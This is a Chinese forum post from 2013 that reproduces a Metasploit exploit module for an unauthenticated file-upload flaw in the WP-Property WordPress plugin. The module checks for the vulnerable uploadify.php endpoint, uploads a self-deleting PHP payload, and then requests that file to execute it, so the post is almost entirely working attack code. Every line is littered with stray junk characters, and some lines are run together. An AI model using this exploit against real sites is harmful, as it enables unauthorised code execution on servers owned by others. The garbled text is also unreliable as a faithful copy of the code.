WordPress WP-Property PHP 文件上传漏洞
4 m# d. Z" M3 {7 E% r) f: e0 c/ |2 O1 T/ ]( G
## # This file is part of the Metasploit Framework and may be subject to
7 \5 v$ J6 @$ }9 j& ]- z' m" {5 T4 a1 ?1 P" j- l3 N
# redistribution and commercial restrictions. Please see the Metasploit
2 y) X( S8 U' ?) r: N* b% J/ e; J& C6 \
# Framework web site for more information on licensing and terms of use.
% Q$ ^. E+ n: @; ?8 l2 A
6 I/ Y6 d( |$ |2 s9 w# http://metasploit.com/framework/ ##
& I! D+ S: n0 c' [1 s {9 @1 ]0 y: R0 C, `7 K5 E0 f3 F+ ?; a
4 O h; J3 U2 b9 j
. m. L5 M/ c! P5 U
5 M! o: H; [1 f; w! a
# K2 r' v" [2 f% q% Q& O) s3 G
require 'msf/core'8 k' T# G# `; n. M2 f
require 'msf/core/exploit/php_exe'
/ @, @$ {7 _ F
2 K. H0 `' s; N% a2 T) O8 Hclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',3 m1 e& _8 t7 Y/ V7 D
'Description' => %q{
& l: q% k( O, ^7 |This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>9 ~5 u. k" Y# E, O; d
[# Z; m- N& k6 h, T* r- {
'Sammy FORGIT', # initial discovery8 ~( S( [$ @/ ?" V; \
'James Fitts <fitts.james[at]gmail.com>' # metasploit module7 `, d' k1 F: a8 h- u+ ]5 |, E
],7 X5 N0 Y' V' z! S
'License' => MSF_LICENSE,9 m3 D2 w% L- i; r5 v
'References' =>( P8 `( o6 A# \3 G
[9 ]0 k% D& p( Z8 Y; G! e
[ 'OSVDB', '82656' ],
( J/ \( V. S% s$ s- o[ 'BID', '53787' ],* a: B8 e6 F2 m: X5 d& _& b% G
[ 'EDB', '18987'],
7 o, J" E3 s$ m& r6 \[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
# f! P- g, H% j& j/ ^],
) E& Z% L' { r. i'Payload' =>
, ^ |8 F5 [! d- d, v& B1 S. q{2 j& m! M$ p$ T1 t8 s8 G4 ~
'BadChars' => "\x00",2 b( w( M7 W9 h* j5 H/ G i
},+ W8 P) V3 m( d+ \
'Platform' => 'php',) m/ V( N! j. \8 v+ \
'Arch' => ARCH_PHP,
3 d- E1 _7 r8 J8 [' |/ T+ {'Targets' =>; ]9 Z2 a6 ?# A2 K+ ?2 v. {% ^, P3 y
[
' u1 N. t# H, i, c3 h8 j- e[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 P& i! s4 J- E- k J
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]8 C: _' L5 Q, U# S1 D
],1 ^5 P. }; X, S* z3 I6 ~: g
'DefaultTarget' => 0,
b- ?; h& U* x& }7 P'DisclosureDate' => 'Mar 26 2012'))
6 L; @0 S6 n1 b0 T
, s7 `' v* R% I% }( O2 ]5 \! ?register_options(
( [8 J) P4 g: r- K[
5 i* X, z# J) O% ^OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 L# `# C& O n* y$ r5 l: j
], self.class)' P$ D% X5 q- t' p1 o& {
end( c7 C: D5 u8 D: n5 x0 z, g; K3 V
2 j+ |2 A; n5 m- b2 s: X. Qdef check( D9 b% e5 V3 L0 q! \) w% o
uri = target_uri.path# b2 {; k* z& V( Z& A% [
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
N f- M: L) q7 n! Z+ r! e" o'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
( [2 _( \# s- c0 B7 n# T})
( e* b( w, X; x6 Q
5 I2 b v+ g/ k) x cif not res or res.code != 200
: z3 H1 ?# t$ O$ v! a& mreturn Exploit::CheckCode::Unknown. p* _! k7 q9 Z- O6 \; F# h
end
9 ~* S6 T; F8 ~! u8 Y+ E& E
0 W( P4 k+ w4 b. X0 U( [2 ?return Exploit::CheckCode::Appears, [/ m% X- B. q8 q% Y2 ^
end! A2 `" K3 |/ L+ y# g+ A
" J0 Q4 R% E" I9 o* Vdef exploit9 y4 B- R( `( W6 V& f* p
uri = target_uri.path: y. l: r; [( T; Y
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
' C5 u0 B& C& O+ y: b0 O1 D/ M8 {* H8 N
0 L; l5 a+ r1 D. o) I( Sdata = Rex::MIME::Message.new
9 R8 \: r$ x& w3 |. ?, W- s! Q. Jdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""); I9 R* |+ ^* K" x
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
& p7 h1 D3 h0 p8 ~3 bpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 S- ?7 s/ |9 r
) O: c; ]* k) X) r1 U! [; Yprint_status("#{peer} - Uploading payload #{@payload_name}"), ?: w1 E6 _+ l0 b
res = send_request_cgi({
7 V4 i" S$ K8 P5 U8 X'method' => 'POST',# L* X Y0 Z+ z0 i1 S% r G
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",2 v$ s) J) z; P: M
'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ d) G8 W8 [, V l'data' => post_data
6 o& @# k9 V( ^4 ]$ }})% x4 Q; X6 r3 p6 ]
/ ?2 p( l% c$ a- R2 Zif not res or res.code != 200 or res.body !~ /#{@payload_name}/) X, U2 x1 d2 A+ m( U+ w+ J- x8 v# N
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
( S! C$ c+ z' |end* a* _3 ]& C7 s* `
% G% x2 U2 j/ r8 B+ \; f8 \/ P# gupload_uri = res.body
, b! U5 V7 w0 Q% C) l( p: r2 N& c- O% {5 h/ V7 h
print_status("#{peer} - Executing payload #{@payload_name}")4 y+ r) r$ q7 {1 N5 O
res = send_request_raw({
3 X7 x I" s7 G5 K9 `: H0 |'uri' => upload_uri,# d! @2 t. a7 V' B+ }' e
'method' => 'GET', Q% x6 g+ f; P5 R8 t4 s9 \8 e
})
3 I) P0 K/ j! U- g* Aend
- Z# F9 f7 t$ w& h( g9 e/ Pend
`) {2 D5 _* G2 `& d
: y! u/ B9 x6 w& e) \不要问我这写的是什么 怎么利用 我是说msf.. W4 x9 e& O' O7 R/ W5 J
( S+ v- U9 S2 x6 H |
发表于 2013-1-4 19:51:30
收藏
支持
反对